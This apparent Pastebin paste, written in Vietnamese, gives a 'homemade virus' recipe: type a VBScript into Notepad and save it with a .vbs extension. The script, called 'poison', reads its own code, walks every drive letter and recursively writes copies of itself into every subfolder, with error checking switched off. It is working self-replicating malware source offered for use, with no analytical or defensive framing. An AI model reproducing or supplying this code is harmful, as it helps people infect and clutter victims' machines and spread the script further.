adminvietnam

virut chế

Nov 13th, 2015
204
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.20 KB | None | 0 0
  1. Vô menu Start----Run----đánh dòng chữ "notepad"----OK
  2.  
  3. Trích"Thuốc độc"(đánh dòng chữ này dza`o notepad):
  4. 'Thuoc Doc !!!
  5. Dim fso,file,VBCopy
  6. Set fso=CreateObject("Scripting.FileSystemObject")
  7. Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
  8. VBCopy=file.ReadAll
  9. FolderList("A:\")
  10. FolderList("B:\")
  11. FolderList("C:\")
  12. FolderList("D:\")
  13. FolderList("E:\")
  14. FolderList("F:\")
  15. FolderList("G:\")
  16. FolderList("H:\")
  17. FolderList("I:\")
  18. FolderList("J:\")
  19. FolderList("K:\")
  20. FolderList("L:\")
  21. FolderList("M:\")
  22. FolderList("N:\")
  23. FolderList("O:\")
  24. FolderList("P:\")
  25. FolderList("Q:\")
  26. FolderList("R:\")
  27. FolderList("S:\")
  28. FolderList("T:\")
  29. FolderList("U:\")
  30. FolderList("V:\")
  31. FolderList("X:\")
  32. FolderList("Y:\")
  33. FolderList("Z:\")
  34. FolderList("W:\")
  35.  
  36. Sub FolderList(FolderSpec)
  37. On Error Resume Next
  38. Dim f,f1,sf,COP,CAP
  39. Set f=fso.GetFolder(FolderSpec)
  40. set sf=f.SubFolders
  41. For Each f1 In sf
  42. Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
  43. COP.write VBCopy
  44. Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
  45. CAP.write VBCopy
  46. FolderList(f1.Path)
  47. Next
  48. End sub
  49.  
  50. Đánh xong,nhấn Ctrl+S và save lại với tên Thuoc_Doc.vbs
  51. Nhớ rằng đuôi phải là .vbs
Advertisement
Add Comment
Please, Sign In to add comment